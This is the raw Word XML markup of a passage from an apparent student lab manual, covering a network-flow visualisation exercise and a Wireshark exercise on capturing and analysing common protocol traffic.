      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Record observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62D20A" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Note suspicious hosts, unusual ports, or Tor traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20B3BC" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Check extracted files or payloads for anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BEE92" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Optionally, cross-verify suspicious IPs with WHOIS or threat intelligence sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BFE27" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Document results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1F0F7" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Capture screenshots of network diagrams and significant flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6028E" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Summarize the suspicious activities identified during analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CDEBA" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="37493094" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD981A6" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20231ED9" wp14:editId="7E632D97">
            <wp:extent cx="5730240" cy="3817620"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="647825587" name="Picture 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Generated imag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0240" cy="3817620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F811D" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Graphical visualization of network hosts and flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41191E23" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Reports listing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5EE11" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Host IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAFBB6" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:lastRenderedPageBreak/>
        <w:t>Connection types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65874091" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Protocols used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4F782" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Extracted payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58013A" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Flags for Tor/malicious traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E340775" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Optional JSON or text files summarizing traffic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0ED0DF" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6FCBC9" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E9B083" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Hosts with the most connections were identified as central nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B259144" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Web traffic, Tor traffic, and DNS requests were visualized clearly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B42CB53" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Suspicious or unusual traffic flows were highlighted for further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EFF06" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRPr="0046081F" w:rsidRDefault="009C01F1" w:rsidP="009C01F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046081F">
        <w:t>Payload extraction revealed potential files or URLs of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A7B26" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="009C01F1"/>
    <w:p w14:paraId="0D1FE50F" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="00D038EC"/>
    <w:p w14:paraId="00279F6E" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="48F73275" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1019DCD9" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="10535F17" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="168814E3" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0128191C" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1D233960" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="64B52D8D" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="6C5E963C" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0B0A9A63" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="71A436C3" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="79606416" w14:textId="77777777" w:rsidR="009C01F1" w:rsidRDefault="009C01F1" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1B54B462" w14:textId="7ED808CA" w:rsidR="00482696" w:rsidRDefault="00BE67C9" w:rsidP="00BE67C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE67C9">
        <w:lastRenderedPageBreak/>
        <w:t>TO CAPTURE, SAVE, AND ANALYZE NETWORK TRAFFIC ON TCP / UDP / IP / HTTP / ARP /DHCP /ICMP /DNS USING WIRESHARK TOOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3762BC" w14:textId="77777777" w:rsidR="00BE67C9" w:rsidRDefault="00BE67C9" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="0093BD53" w14:textId="68E433C4" w:rsidR="00BE67C9" w:rsidRDefault="00BE67C9" w:rsidP="00BE67C9">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00962BAB">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>No:</w:t>
      </w:r>
      <w:r w:rsidR="000F4E53">
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAC4C2" w14:textId="77777777" w:rsidR="00BE67C9" w:rsidRDefault="00BE67C9" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="0C4F5401" w14:textId="77777777" w:rsidR="00ED6902" w:rsidRPr="00ED6902" w:rsidRDefault="00ED6902" w:rsidP="00ED6902">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6902">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A566F85" w14:textId="77777777" w:rsidR="00ED6902" w:rsidRDefault="00ED6902" w:rsidP="00ED6902">
      <w:r w:rsidRPr="00ED6902">
        <w:t xml:space="preserve">To study and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED6902">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED6902">
        <w:t xml:space="preserve"> different network protocol packets such as TCP, UDP, IP, HTTP, ARP, DHCP, ICMP, and DNS by capturing live network traffic using </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6902">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6902">
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A0FE6" w14:textId="77777777" w:rsidR="00AF01D8" w:rsidRPr="00ED6902" w:rsidRDefault="00AF01D8" w:rsidP="00ED6902"/>
    <w:p w14:paraId="4CB47E33" w14:textId="77777777" w:rsidR="00AF01D8" w:rsidRPr="00AF01D8" w:rsidRDefault="00AF01D8" w:rsidP="00AF01D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF01D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A43FE" w14:textId="77777777" w:rsidR="00AF01D8" w:rsidRPr="00AF01D8" w:rsidRDefault="00AF01D8" w:rsidP="00AF01D8">
      <w:r w:rsidRPr="00AF01D8">
        <w:t xml:space="preserve">Wireshark is a powerful network protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t>analyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t xml:space="preserve"> used to monitor and capture live network packets. It allows users to inspect protocols at each layer of the OSI model and understand how data is transmitted over the network.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF01D8">
        <w:br/>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t xml:space="preserve"> captured packets, we can identify communication patterns, troubleshoot connectivity issues, and study protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF01D8">
        <w:t xml:space="preserve"> such as TCP handshakes, DNS lookups, HTTP requests, and ICMP pings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D08FDE" w14:textId="77777777" w:rsidR="00BE67C9" w:rsidRDefault="00BE67C9" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="365E7DF8" w14:textId="6B61F5FC" w:rsidR="009208A4" w:rsidRPr="009208A4" w:rsidRDefault="009208A4" w:rsidP="009208A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009208A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62136523" w14:textId="77777777" w:rsidR="009208A4" w:rsidRPr="009208A4" w:rsidRDefault="009208A4" w:rsidP="009208A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009208A4">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:t xml:space="preserve"> application on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1BEBF3" w14:textId="77777777" w:rsidR="009208A4" w:rsidRPr="009208A4" w:rsidRDefault="009208A4" w:rsidP="009208A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009208A4">
        <w:t xml:space="preserve">Select the </w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>active network interface</w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:t xml:space="preserve"> (Wi-Fi or Ethernet) to capture packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533782E5" w14:textId="77777777" w:rsidR="009208A4" w:rsidRPr="009208A4" w:rsidRDefault="009208A4" w:rsidP="009208A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009208A4">
        <w:t xml:space="preserve">Click on </w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Capturing Packets</w:t>
      </w:r>
      <w:r w:rsidRPr="009208A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF0B90" w14:textId="2A31A093" w:rsidR="00B52EFE" w:rsidRPr="00F400D5" w:rsidRDefault="00B52EFE" w:rsidP="00B52EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F400D5">
        <w:t>Open Command Prompt in Windows and execute the commands to generate various types of traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0196D34D" w14:textId="71230D31" w:rsidR="00E527DF" w:rsidRDefault="00E527DF" w:rsidP="00E527DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> After running </w:t>
      </w:r>
      <w:r w:rsidR="000A6E07">
        <w:t>the commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, return to Wireshark and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Stop Capture</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234F22A" w14:textId="5B081EDB" w:rsidR="00E527DF" w:rsidRDefault="00E527DF" w:rsidP="00E527DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Save the captured packets as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4812BD" w14:textId="112532D7" w:rsidR="00773BAC" w:rsidRDefault="00DB6E0D" w:rsidP="00E527DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6E0D">
        <w:t>Observe packet details such as Source &amp; Destination IP, MAC addresses, ports, and payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E12A3" w14:textId="3FB8470F" w:rsidR="00AF01D8" w:rsidRDefault="000A6E07" w:rsidP="00BE67C9">
      <w:r w:rsidRPr="000A6E07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF6F4D" w14:textId="6D9E828C" w:rsidR="000A6E07" w:rsidRDefault="00365CB9" w:rsidP="00BE67C9">
      <w:r w:rsidRPr="00365CB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750314EA" wp14:editId="75A231C1">
            <wp:extent cx="5731510" cy="1224280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="108985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56708" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1224280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A71AC" w14:textId="77777777" w:rsidR="00365CB9" w:rsidRDefault="00365CB9" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="4B7E6050" w14:textId="1BDA6D93" w:rsidR="00365CB9" w:rsidRDefault="00006D23" w:rsidP="00BE67C9">
      <w:r w:rsidRPr="00804A97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C45070" w14:textId="3FC5D404" w:rsidR="00AA419F" w:rsidRDefault="00962BAB" w:rsidP="00BE67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="1520" w:dyaOrig="987" w14:anchorId="7D18E994">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:75.6pt;height:49.2pt" o:ole="">
            <v:imagedata r:id="rId48" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1029" DrawAspect="Icon" ObjectID="_1823145913" r:id="rId49"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="03095DCD" w14:textId="77777777" w:rsidR="00004EAD" w:rsidRDefault="00004EAD" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="43410471" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="18C29823" w14:textId="33BAAC7A" w:rsidR="00004EAD" w:rsidRDefault="00004EAD" w:rsidP="00BE67C9">
      <w:r w:rsidRPr="00804A97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB4A04" w14:textId="72B4062B" w:rsidR="00875210" w:rsidRDefault="00875210" w:rsidP="00BE67C9">
      <w:r w:rsidRPr="00875210">
        <w:t xml:space="preserve">The experiment to </w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">capture and </w:t>
      </w:r>
      <w:r w:rsidR="00804A97" w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> network traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:t xml:space="preserve"> was successfully performed.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:br/>
        <w:t xml:space="preserve">Packets for </w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP, UDP, IP (IPv6), HTTP, ARP, ICMP, and DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:t xml:space="preserve"> were captured and </w:t>
      </w:r>
      <w:r w:rsidR="00804A97" w:rsidRPr="00875210">
        <w:t>analysed</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:br/>
        <w:t xml:space="preserve">Hence, the objective of the experiment is </w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>achieved successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="00875210">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EB5E1" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="523DA940" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="788D669B" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="7E74CD1B" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="721CDE5A" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="6A28E182" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="2BD26EA1" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="4A4EF579" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="7B04217F" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
    <w:p w14:paraId="76D59FCD" w14:textId="77777777" w:rsidR="00361504" w:rsidRDefault="00361504" w:rsidP="00BE67C9"/>
